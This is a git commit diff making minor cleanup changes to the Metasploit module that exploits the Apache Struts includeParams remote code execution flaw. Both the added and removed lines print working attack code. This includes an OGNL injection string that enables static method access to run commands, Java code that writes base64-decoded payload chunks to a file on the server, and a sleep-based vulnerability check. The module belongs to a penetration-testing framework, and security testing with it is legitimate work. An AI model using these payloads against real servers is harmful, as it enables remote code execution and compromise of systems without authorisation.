Do minor cleanup for struts_include_params

jvazquez-r7 · jvazquez-r7 · commit 146a30ec4d71 · 2013-05-31T01:01:15.000-05:00
diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb
@@ -8,7 +8,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = ExcellentRanking
+	Rank = GreatRanking
 
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::EXE
@@ -18,17 +18,22 @@ def initialize(info = {})
 		super(update_info(info,
 			'Name'           => 'Apache Struts includeParams Remote Code Execution',
 			'Description'    => %q{
-				This module exploits a remote command execution vulnerability in Apache Struts
+					This module exploits a remote command execution vulnerability in Apache Struts
 				versions < 2.3.14.2. A specifically crafted request parameter can be used to inject
 				arbitrary OGNL code into the stack bypassing Struts and OGNL library protections.
+				When targeting an action which requires interaction through GET the payload should
+				be split having into account the uri limits. In this case, if the rendered jsp has
+				more than one point of injection, it could result in payload corruption. It should
+				happen only when the payload is larger than the uri length.
 			},
 			'Author'         =>
 				[
+					# This vulnerability was also discovered by unknown members of:
+					#    'Coverity security Research Laboratory'
+					#    'NSFOCUS Security Team'
 					'Eric Kobrin', # Vulnerability Discovery
 					'Douglas Rodrigues', # Vulnerability Discovery
-					'Coverity security Research Laboratory', # Vulnerability Discovery
-					'NSFOCUS Security Team', # Vulnerability Discovery
-					'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
+					'Richard Hicks <scriptmonkey.blog[at]gmail.com>' # Metasploit Module
 				],
 			'License'        => MSF_LICENSE,
 			'References'     =>
@@ -46,7 +51,7 @@ def initialize(info = {})
 					['Windows Universal',
 						{
 							'Arch' => ARCH_X86,
-							'Platform' => 'windows'
+							'Platform' => 'win'
 						}
 					],
 					['Linux Universal',
@@ -65,18 +70,14 @@ def initialize(info = {})
 			'DisclosureDate' => 'May 24 2013',
 			'DefaultTarget' => 2))
 
-			register_options(
-				[
-					Opt::RPORT(8080),
-					OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),
-					OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', "/struts2-blank3/example/HelloWorld.action"]),
-					OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','GET', ['GET','POST']]),
-					OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
-		], self.class)
-
-		#initialise some base vars
-		@inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
-		@java_upload_part_cmd = "#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()"
+		register_options(
+			[
+				Opt::RPORT(8080),
+				OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]),
+				OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', "/struts2-blank/example/HelloWorld.action"]),
+				OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]),
+				OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
+			], self.class)
 	end
 
 	def execute_command(cmd, opts = {})
@@ -90,7 +91,7 @@ def execute_command(cmd, opts = {})
 				req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }})
 		end
 
-# Display a nice "progress bar" instead of message spam
+		# Display a nice "progress bar" instead of message spam
 		case @notify_flag
 		when 0
 			print_status("Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload")
@@ -105,6 +106,9 @@ def execute_command(cmd, opts = {})
 	end
 
 	def exploit
+		#initialise some base vars
+		@inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
+		@java_upload_part_cmd = "#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()"
 		#Set up generic values.
 		@payload_exe = rand_text_alphanumeric(4+rand(4))
 		pl_exe = generate_payload_exe
@@ -172,6 +176,8 @@ def java_upload_part(part, filename, append = false)
 	end
 
 	def check
+		#initialise some base vars
+		@inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"
 		print_status("Performing Check...")
 		sleep_time = datastore['CHECK_SLEEPTIME']
 		check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"
